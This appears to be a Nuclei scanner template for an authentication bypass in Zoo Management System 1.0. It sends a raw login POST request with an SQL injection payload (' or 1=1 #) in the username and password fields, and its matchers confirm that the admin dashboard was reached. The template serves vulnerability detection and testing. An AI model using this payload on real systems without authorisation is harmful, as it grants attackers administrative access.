id: zms-auth-bypass info: name: Zoo Management System 1.0 - Authentication Bypass author: dwisiswant0 severity: high description: A vulnerability in Zoo Management allows remote attackers to bypass the authentication mechanism via an SQL injection vulnerability. reference: - https://www.exploit-db.com/exploits/48880 tags: zms,edb,auth-bypass requests: - raw: - | POST /zms/admin/index.php HTTP/1.1 Host: {{Hostname}} Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Content-Type: application/x-www-form-urlencoded Origin: {{BaseURL}} Referer: {{BaseURL}}/zms/admin/index.php Cookie: PHPSESSID={{randstr}} username=dw1%27+or+1%3D1+%23&password=dw1%27+or+1%3D1+%23&login= redirects: true max-redirects: 1 matchers-condition: and matchers: - type: regex regex: - "Zoo Management System (\\|\\| Dashboard|@ 2020\\. All right reserved)" - "ZMS ADMIN" condition: and part: body - type: status status: - 200